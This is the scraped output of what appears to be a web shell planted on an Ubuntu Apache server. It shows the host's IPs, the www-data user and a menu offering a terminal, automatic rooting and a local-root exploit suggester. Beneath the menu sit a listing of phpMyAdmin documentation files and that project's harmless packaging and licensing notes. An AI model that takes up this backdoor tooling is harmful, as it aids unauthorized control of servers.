Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.117.189.143
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
phpmyadmin /
html /
_sources /
Delete
Unzip
Name
Size
Permission
Date
Action
bookmarks.rst.txt
2.41
KB
-rw-r--r--
2021-06-04 04:20
charts.rst.txt
4.63
KB
-rw-r--r--
2021-06-04 04:20
config.rst.txt
117.69
KB
-rw-r--r--
2021-06-04 04:20
copyright.rst.txt
1.58
KB
-rw-r--r--
2021-06-04 04:20
credits.rst.txt
27.36
KB
-rw-r--r--
2021-06-04 04:20
developers.rst.txt
380
B
-rw-r--r--
2021-06-04 04:20
faq.rst.txt
92.59
KB
-rw-r--r--
2021-06-04 04:20
glossary.rst.txt
14.8
KB
-rw-r--r--
2021-06-04 04:20
import_export.rst.txt
9.97
KB
-rw-r--r--
2021-06-04 04:20
index.rst.txt
573
B
-rw-r--r--
2021-06-04 04:20
intro.rst.txt
3.08
KB
-rw-r--r--
2021-06-04 04:20
other.rst.txt
916
B
-rw-r--r--
2021-06-04 04:20
privileges.rst.txt
3.19
KB
-rw-r--r--
2021-06-04 04:20
relations.rst.txt
3.26
KB
-rw-r--r--
2021-06-04 04:20
require.rst.txt
1.64
KB
-rw-r--r--
2021-06-04 04:20
security.rst.txt
4.5
KB
-rw-r--r--
2021-06-04 04:20
settings.rst.txt
1015
B
-rw-r--r--
2021-06-04 04:20
setup.rst.txt
42.39
KB
-rw-r--r--
2021-06-04 04:20
themes.rst.txt
2.87
KB
-rw-r--r--
2021-06-04 04:20
transformations.rst.txt
7.76
KB
-rw-r--r--
2021-06-04 04:20
two_factor.rst.txt
2.81
KB
-rw-r--r--
2021-06-04 04:20
user.rst.txt
195
B
-rw-r--r--
2021-06-04 04:20
vendors.rst.txt
1.92
KB
-rw-r--r--
2021-06-04 04:20
Save
Rename
Distributing and packaging phpMyAdmin ===================================== This document is intended to give pieces of advice to people who want to redistribute phpMyAdmin inside other software packages such as Linux distribution or some all in one package including web server and MySQL server. Generally, you can customize some basic aspects (paths to some files and behavior) in :file:`libraries/vendor_config.php`. For example, if you want setup script to generate a config file in var, change ``SETUP_CONFIG_FILE`` to :file:`/var/lib/phpmyadmin/config.inc.php` and you will also probably want to skip directory writable check, so set ``SETUP_DIR_WRITABLE`` to false. External libraries ------------------ phpMyAdmin includes several external libraries, you might want to replace them with system ones if they are available, but please note that you should test whether the version you provide is compatible with the one we ship. Currently known list of external libraries: js/vendor jQuery js framework libraries and various js libraries. vendor/ The download kit includes various Composer packages as dependencies. Specific files LICENSES ----------------------- phpMyAdmin distributed themes contain some content that is under licenses. - `themes/*/img/b_rename.svg` Is a `Icons8 <https://thenounproject.com/Icons8/>`_, icon from the `Android L Icon Pack Collection <https://thenounproject.com/Icons8/collection/android-l-icon-pack/>`_. The icon `rename <https://thenounproject.com/term/rename/61456/>`_. - `themes/metro/img/user.svg` Is a IcoMoon the `user <https://github.com/Keyamoon/IcoMoon-Free/blob/master/SVG/114-user.svg>`_ CC BY 4.0 or GPL Licenses for vendors -------------------- - `rename` from `Icons8` is under the `"public domain" <https://creativecommons.org/publicdomain/zero/1.0/>`_ (CC0 1.0) license. - IcoMoon Free is under `"CC BY 4.0 or GPL" <https://github.com/Keyamoon/IcoMoon-Free/blob/master/License.txt>`_.